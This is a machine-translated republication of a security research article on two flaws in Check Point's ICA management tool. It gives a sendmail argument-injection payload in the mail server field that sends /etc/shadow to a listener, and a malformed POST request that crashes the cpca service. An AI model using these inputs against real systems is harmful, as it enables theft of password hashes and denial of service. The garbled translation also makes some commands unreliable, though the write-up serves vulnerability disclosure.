Shulou(Shulou.com)05/31 Report--

This article mainly introduces the use of Checkpoint ICA management tools, the article is very detailed, has a certain reference value, interested friends must read it!

In this article, we will analyze several security vulnerabilities we found in the Checkpoint security management suite, which is used in many Check Point products, which is the Checkpoint ICA management tool.

The Checkpoint ICA management tool can help us manage the following user certificates:

Run search

Recreate CRLs

Configure ICA

Delete expired certificates

By default, this service is turned off, and we need to use the built-in utility cpca_client to turn it on:

Cpca_client set_mgmt_tool on-no_ssl

It is important to note that if we run this command, any user will be able to use the service without authentication. Therefore, we recommend that you only use SSL to run this service. You can enable SSL using the following command and a pre-generated certificate:

Cpca_client set_mgmt_tool on-u

Once this component is enabled, you can access the Web interface of the ICA management tool by accessing the http://:18265/" address. Here, we need to enable this component without using SSL.

During our analysis of the ICA management tool, we found the following two vulnerabilities.

Parameter injection vulnerability

The first vulnerability is similar to a command injection vulnerability, where an attacker can inject or insert custom commands when passing parameters to the target application. In the process of analysis, we can take advantage of this vulnerability to inject commands with custom parameters when calling internal system commands and execute them successfully.

A prominent feature of the Web interface is the ability to send notification messages to users about certificate initialization while still retaining the ability to modify standard e-mail Header, such as sender, recipient, subject, mail server address, and so on. At first, someone tried to inject the Shell command as an argument into the mail server address parameter, which is similar to taking advantage of the wrong "ping" command through incorrect input validation, but in fact this cannot be executed as a / bin/sh command.

Next, we need to study and identify the process responsible for sending mail, and one of the possible processes is called "cpca" because it listens on port 18265. Through string search, we found and identified the code responsible for interacting with email, which is our goal. It is important to note that the cpca binary contains the string "send_mail_file.txt", which also indicates that it has the ability to send attachments. Here, we must have an in-depth understanding of the command-line arguments of sendmail before we can construct the corresponding injection string.

Sendmail [- t server] [[- m filename] | [- s subject] [- f from] email-address]

Even so, we still can't speculate about the order in which command-line arguments have been executed, so we have to find another way. Here, we choose to add the command line parameters of sendmail to the parameters of the Web interface, and through logging we can determine that the server file specified at the time of parameter injection has been sent to the attacker-controlled mail server.

To exploit this vulnerability, we need to use nc to listen on local port 25, and then when configuring the CA certificate, we need to set the administrative tools mail server to "127.0.0.1-m / etc/shadow%0a%0a". It is important to note that "\ n\ n" should not appear at the end of the field.

Next, we need to send a request to trigger the sending of the mail, and the certs parameter contains the certificate ID and the mail status.

As shown in the following figure, the content in / etc/shadow has been sent to port 25 on which nc listens:

Denial of service vulnerability

The denial of service vulnerability in this component is caused by the failure to validate user input data. If the remote client sends a specially constructed POST request and the body of the request is formatted in an abnormal way, it will cause the program to shut down unexpectedly.

To verify this vulnerability, we generated the following POST request:

POST / file_init?_ HTTP/1.1Host: checkpoint.host:18265Cookie: _ Content-Length: 1 q

After receiving this request, cpca will crash.

These are all the contents of this article entitled "what are Checkpoint ICA Management tools for?" Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.